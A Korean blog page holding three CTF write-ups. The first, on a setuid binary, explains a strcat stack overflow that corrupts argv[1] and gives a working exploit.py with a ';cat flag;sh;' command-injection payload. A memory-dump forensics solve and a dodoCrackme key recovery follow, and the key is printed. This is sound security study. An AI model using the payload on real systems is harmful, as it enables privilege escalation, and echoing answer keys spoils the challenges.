setuid ๊ฐ€ ๊ฑธ๋ ค์žˆ๋Š” 64bit ELF ๋ฐ”์ด๋„ˆ๋ฆฌ์ด๋‹ค.




์†Œ์Šค์ฝ”๋“œ๋ฅผ ๊ฐ„๋‹จํžˆ ๋ถ„์„ํ•ด๋ณด๋ฉด,

๊ฐ€์žฅ ๋จผ์ €, sub_40075c() ํ•จ์ˆ˜๋กœ ์ง„์ž…ํ•˜์—ฌ ํ™˜๊ฒฝ๋ณ€์ˆ˜ ์˜์—ญ์„ ์ดˆ๊ธฐํ™” ํ•œ๋‹ค. ๊ทธ ํ›„ argv[1] ์˜ ๊ฐ’์ด ์žˆ๋Š”์ง€ ํ™•์ธํ•œ ํ›„, ๊ฐ’์ด ์กด์žฌํ•œ๋‹ค๋ฉด strcat() ํ•จ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ argv[1] ์˜ ๊ฐ’์„ &command ์— ๋„ฃ๊ฒŒ ๋˜๋Š”๋ฐ ์—ฌ๊ธฐ์„œ ํฌ๊ธฐ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ์— stack overflow๊ฐ€ ๋ฐœ์ƒํ•œ๋‹ค. ๊ทธ ํ›„ __ctype_b_loc ํ•จ์ˆ˜๋ฅผ ํ†ตํ•ด ํŠน์ˆ˜๋ฌธ์ž ๊ฒ€์‚ฌ๋ฅผ ํ•˜๊ณ , ํŠน์ˆ˜๋ฌธ์ž๊ฐ€ ์กด์žฌํ•˜์ง€ ์•Š๋Š”๋‹ค๋ฉด syst

em() ํ•จ์ˆ˜๋ฅผ ํ†ตํ•ด ์–ด๋–ค ๋ช…๋ น์„ ์‹คํ–‰์‹œํ‚ฌ ์ˆ˜ ์žˆ๋‹ค.





ASLR, NX ๊ฐ€ ๊ฑธ๋ ค์žˆ๊ณ , Canary ๋˜ํ•œ ์กด์žฌํ•œ๋‹ค.


for ๋ฌธ์„ ํ™•์ธํ•ด๋ณด๋ฉด, strlen(argv[1])์„ ๊ตฌํ•ด์„œ ํŠน์ˆ˜๋ฌธ์ž๋ฅผ ๊ฒ€์‚ฌํ•˜๊ฒŒ ๋˜๋Š”๋ฐ argv[1] ์˜ ์ฃผ์†Œ๋Š” ์Šคํƒ์— ์žˆ๋‹ค.

์ฆ‰, argv[1] ์˜ ์ฃผ์†Œ๊นŒ์ง€ ์ ‘๊ทผํ•˜์—ฌ ์ฃผ์†Œ๋ฅผ ์กฐ์ž‘ํ•  ์ˆ˜ ์žˆ๋‹ค. 

์ •ํ™•ํžˆ argv[1] ์˜ ์ฃผ์†Œ๋ฅผ ์กฐ์ž‘ํ•˜๊ธฐ ์œ„ํ•ด์„œ &command ๋ถ€ํ„ฐ argv[1] ์˜ offset ์„ ๊ตฌํ•ด์•ผํ•œ๋‹ค.





$rsi = argv[1] addr

$rdi = &command





0x7fffef7f1190 ์ฃผ์†Œ์— &argv[1] ์ด ์กด์žฌํ•œ๋‹ค.

offset = 0x7fffef7f1190 - $rdi(0x7fffef7f0f80) = 528byte

๊ทธ๋Ÿฌ๋‚˜, command ์— ์ด๋ฏธ "id " ๋ฌธ์ž์—ด์ด ๋“ค์–ด๊ฐ€ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— 3byte ๋งŒํผ ๋นผ์ฃผ๋ฉด 525byte ๊ฐ€ ์ •ํ™•ํ•œ offset ์ž„์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.





"A" * 525byte + "BBBBBB" => argv[1]์˜ ์ฃผ์†Œ๋ฅผ ์กฐ์ž‘ํ•œ ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.


strlen(argv[1]) ๋ฆฌํ„ด ๊ฐ’์„ ์กฐ์ž‘ํ•˜๊ธฐ ์œ„ํ•œ ์—ฌ๋Ÿฌ๊ฐ€์ง€ ๋ฐฉ๋ฒ•์ด ์žˆ๋Š”๋ฐ,

[*] argv[1] ์ฃผ์†Œ๋ฅผ Null ๋กœ ์ดˆ๊ธฐํ™” ๋œ ํ™˜๊ฒฝ๋ณ€์ˆ˜ ์˜์—ญ์œผ๋กœ ์กฐ์ž‘

[*] 64bit ๊ณ ์ •๋œ ์ฃผ์†Œ์ธ vsyscall ์˜์—ญ์œผ๋กœ ์กฐ์ž‘

[*] 521byte + ";sh;" ์™€ ๊ฐ™์ด ํฌ๊ธฐ์— ๋งž์ถฐ ๋ช…๋ น์„ ๋„ฃ์–ด์ฃผ๋ฉด ๋์— "\x00" ์ด ๋ถ™์–ด์„œ ์กฐ์ž‘ํ•  ์ˆ˜ ์žˆ๋‹ค.




- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  exploit.py  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


import os


command = ";cat flag;sh;"

payload = "./shock " + "A" * (525 - len(command)) + command


os.system(payload)


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



'CTF Writeup' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[CodeGate 2014 CTF] dodoCrackme  (0) 2016.06.11

WRITTEN BY
LuCeT3

,


ํŒŒ์ผ์„ ๋‹ค์šด ๋ฐ›๊ฒŒ ๋˜๋ฉด 





๋˜์ž‰ ch2.dmp๋ผ๋Š” ๋คํ”„ํŒŒ์ผ์„ ์–ป์„ ์ˆ˜ ์žˆ๋‹ค.!!! 


๋ฌธ์ œ๋ฅผ ํ•ด์„ํ•ด๋ณด์ž!


์ •๋‹ต์€ ์›Œํฌ์Šคํ…Œ์ด์…˜ ํ˜ธ์ŠคํŠธ๋„ค์ž„(์ฆ‰, ์ปดํ“จํ„ฐ์ด๋ฆ„)์ด ์ •๋‹ต์ด๋ž€๋‹ค.! :) ๋ฃฐ๋ฃจ~ ๊ทธ๋Ÿผ ํ•ด๋ณด์ž


ํ•„์ž๋Š” strings ๋ผ๋Š” ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ’€์–ด๋ณผ ๊ฒƒ์ด๋‹ค.


strings ch2.dmp | grep COMPUTERNAME  <= ์ด๋ ‡๊ฒŒ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•  ๊ฒƒ์ด๋‹ค.





๊ทธ๋Ÿฌํ•˜๋‹ค ์ •๋‹ต์ด๋‹ค. ์ฒ˜์Œ์— ์ƒ๊ฐํ• ๋• ์–ด๋ ต์ง€๋งŒ ์›Œํฌ์Šคํ…Œ์ด์…˜ ํ˜ธ์ŠคํŠธ๋„ค์ž„์„ ์ž˜์ƒ๊ฐํ•˜๋ฉด ์‰ฝ๋‹ค.


๋„์~!!!


WRITTEN BY
LuCeT3

,

 

file ๋ช…๋ น์„ ํ†ตํ•ด 64bit ๋ฆฌ๋ˆ…์Šค ํ™˜๊ฒฝ์˜ ๋ฐ”์ด๋„ˆ๋ฆฌ์ž„์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

IDA๋ฅผ ํ†ตํ•ด Import, String ๋“ฑ ์ •๋ณด๋ฅผ ์–ป๊ธฐ ์œ„ํ•ด ํ™•์ธํ•ด๋ณด์•˜์ง€๋งŒ ๊น”๋”ํžˆ ๋น„์–ด์žˆ๋‹ค...

 

 

 

์‹คํ–‰์‹œํ‚ค๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์ด password๋ฅผ ์ž…๋ ฅ๋ฐ›๋Š”๋‹ค.

์ž„์˜์˜ password ๋ฅผ ์ž…๋ ฅํ•˜๋‹ˆ "Permission denied (password)." ๋ฌธ์ž์—ด์„ ์ถœ๋ ฅํ•œ๋‹ค.

 

 

 

 

IDA๋ฅผ ํ†ตํ•ด debugging์„ ํ•˜๋‹ค๋ณด๋ฉด, ํ‚ค ๊ฐ’์ด ์ƒ์„ฑ๋œ๋‹ค๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

๋งจ ์ฒ˜์Œ ํ’€ ๋•Œ๋Š” ๋…ธ๊ฐ€๋‹ค๋ฅผ ํ•ด์„œ ๋ฉ”๋ชจ๋ฆฌ์— ํ‚ค ๊ฐ’์„ ์ฐพ์•„๋ƒˆ๋‹ค. ์ข€ ๋” ๋นจ๋ฆฌ ํ’€๊ธฐ์œ„ํ•ด ์‹œ๋„ํ•˜๋‹ค password๋ฅผ ์ž…๋ ฅ๋ฐ›๋Š” ๊ณณ์—์„œ ๋ธŒ๋ ˆ์ดํฌ์ธํŠธ๋ฅผ ์„ค์ •ํ•œ๋‹ค๋ฉด ๋ฉ”๋ชจ๋ฆฌ์— ํ‚ค ๊ฐ’์ด ์ƒ์„ฑ๋˜์žˆ๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

 

 

 

 

๋ฐ”์ด๋„ˆ๋ฆฌ ์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด ์ด๋Ÿฌํ•œ ํ‚ค ๊ฐ’์„ ์ž…๋ ฅ๋ฐ›๊ธฐ ์œ„ํ•ด syscall ์„ ์‚ฌ์šฉํ•œ ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

๊ทธ๋ฆฌ๊ณ  strace๋ฅผ ์ด์šฉํ•˜์—ฌ ์–ด๋””์—์„œ ์ž…๋ ฅ๋ฐ›๋Š”์ง€ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

 

 

 

 

ํ•ด๋‹น ์ฝ”๋“œ๋ถ€๋ถ„์— breakpoint๋ฅผ ๊ฑธ๊ณ  ์‹คํ–‰ํ•˜๋ฉด ํ‚ค ์ž…๋ ฅ๋ฐ›๋Š” ๊ณณ์—์„œ ๋ฉˆ์ถ”๊ฒŒ ๋œ๋‹ค.

 

 

 

 

 

breakpoint ์ง€์ ๊นŒ์ง€ ๊ฐ„ ํ›„, ์Šคํƒ์„ ํ™•์ธํ•ด๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์ด ํ‚ค ๊ฐ’์ด ์ƒ์„ฑ๋œ ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.


 

KEY : H4PPY_C0DEGaTE_2014_CU_1N_K0RE4

 

 

 

 

'CTF Writeup' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[CodeGate 2015 CTF] systemshock  (0) 2016.07.30

WRITTEN BY
LuCeT3

,